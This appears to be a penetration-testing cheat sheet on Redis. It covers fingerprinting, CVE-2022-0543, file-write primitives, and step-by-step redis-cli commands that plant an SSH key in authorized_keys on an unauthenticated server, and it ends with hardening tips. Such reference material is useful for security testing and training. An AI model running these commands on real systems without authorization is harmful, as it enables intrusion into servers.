Redis | KagisoSec

Ports

Port	Proto	Notes
`6379`	tcp	Redis server, often unauthenticated

Fingerprint

PING returns +PONG, INFO leaks version and config
CONFIG GET dir returns the data directory (no error = no auth)

Key files

Path	Holds	Sensitive
`/etc/redis/redis.conf`	bind address and requirepass (if set)	sensitive
`/var/lib/redis/`	default data dir, also the default dump location
`/var/lib/redis/.ssh/authorized_keys`	classic write target for a foothold

Default / weak creds

no auth by default; requirepass sometimes set in redis.conf

Service users

redis

Known CVEs

CVE	Impact
CVE-2022-0543	Lua sandbox escape on Debian/Ubuntu packaging, unauthenticated RCE

Exploitation primitives

CONFIG SET dir + CONFIG SET dbfilename + SAVE writes an RDB file anywhere the redis user can: SSH key into ~/.ssh/authorized_keys, webshell into the web root, or a cron job into /var/spool/cron
MODULE LOAD a malicious .so (redis-rogue-server) for direct RCE on 4.x/5.x
Replication-based RCE (slaveof a rogue master) on some versions

Overview

Redis is an in-memory data store on 6379. When it answers without a password, any client can read/write keys and, crucially, change where Redis writes its dump file, which makes it a clean arbitrary file-write primitive.

Enumeration

Is it alive (expect +PONG):

redis-cli -h <TARGET> ping

Version:

redis-cli -h <TARGET> info server

Data directory (a clean answer confirms no auth):

redis-cli -h <TARGET> config get dir

Foothold (file write)

Point Redis at the .ssh directory:

redis-cli -h <TARGET> config set dir /var/lib/redis/.ssh

Name the dump file:

redis-cli -h <TARGET> config set dbfilename authorized_keys

Load your public key into a value:

cat key.txt | redis-cli -h <TARGET> -x set ssh_key

Write it to disk:

redis-cli -h <TARGET> save

Pad the public key with blank lines so OpenSSH parses it past the RDB metadata. Other targets: a webshell into the web root, or a cron entry for code exec.

Hardening

Set requirepass, bind to localhost, and enable protected-mode and ACLs.